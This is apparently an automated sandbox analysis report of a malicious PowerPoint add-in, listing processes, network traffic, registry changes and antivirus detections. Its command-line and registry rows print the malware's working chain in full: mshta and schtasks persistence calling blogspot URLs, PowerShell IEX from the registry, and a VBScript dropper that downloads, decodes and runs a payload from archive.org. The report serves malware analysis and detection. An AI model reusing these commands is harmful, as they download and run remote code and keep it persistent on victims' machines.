Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 30, 2021, 9:43 a.m. | April 30, 2021, 9:45 a.m. |
-
POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company Details.ppam"
996-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
8104
-
-
IP Address | Status | Action |
---|---|---|
142.250.199.65 | Active | Moloch |
142.250.204.110 | Active | Moloch |
142.250.66.109 | Active | Moloch |
142.250.66.41 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.25.14 | Active | Moloch |
172.217.26.137 | Active | Moloch |
207.241.227.129 | Active | Moloch |
67.199.248.10 | Active | Moloch |
67.199.248.17 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49812 172.217.26.137:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49810 142.250.199.65:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com | 9c:32:17:b5:e8:f9:04:a7:4d:a7:f0:b9:db:ca:b3:18:75:b5:cb:50 |
TLSv1 192.168.56.102:49819 207.241.227.129:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | OU=Domain Control Validated, CN=*.us.archive.org | 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0 |
TLSv1 192.168.56.102:49814 142.250.66.41:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49815 142.250.66.41:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37 |
TLSv1 192.168.56.102:49813 172.217.26.137:443 |
None | None | None |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt |
request | GET http://www.j.mp/ddsobpechateessentesathatesesjdw |
request | GET http://bit.ly/ddsobpechateessentesathatesesjdw |
request | GET https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html |
request | GET https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css |
request | GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js |
request | GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js |
request | GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=b73d5666-d098-4854-a4dd-8e948356adfd |
request | GET https://www.blogger.com/static/v1/widgets/1564291244-widgets.js |
request | GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif |
request | GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png |
request | GET https://www.blogger.com/blogin.g?blogspotURL=https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html&type=blog |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png |
request | GET https://www.blogger.com/img/share_buttons_20_3.png |
request | GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\1564291244-widgets[1].js |
cmdline | mshta http://www.j.mp/ddsobpechateessentesathatesesjdw |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
cmdline | cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
host | 172.217.25.14 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM | reg_value | mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close") | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography | reg_value | "mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html" | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default) | reg_value | "mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html" | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo | reg_value | "mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html" | ||||||
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") | ||||||||
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") |
Alibaba | TrojanDownloader:VBA/MalDoc.ali1000101 |
Arcabit | VBA:Amphitryon.227 |
Kaspersky | HEUR:Trojan.MSOffice.SAgent.gen |
BitDefender | VBA:Amphitryon.227 |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
MicroWorld-eScan | VBA:Amphitryon.227 |
Ad-Aware | VBA:Amphitryon.227 |
McAfee-GW-Edition | Artemis!Trojan |
FireEye | VBA:Amphitryon.227 |
Emsisoft | VBA:Amphitryon.227 (B) |
Ikarus | Trojan-Downloader.VBA.Agent |
GData | VBA:Amphitryon.227 |
AegisLab | Trojan.MSOffice.SAgent.4!c |
SentinelOne | Static AI - Malicious OPENXML |
Fortinet | VBA/Agent.3FED!tr |
parent_process | powerpnt.exe | martian_process | mshta http://www.j.mp/ddsobpechateessentesathatesesjdw |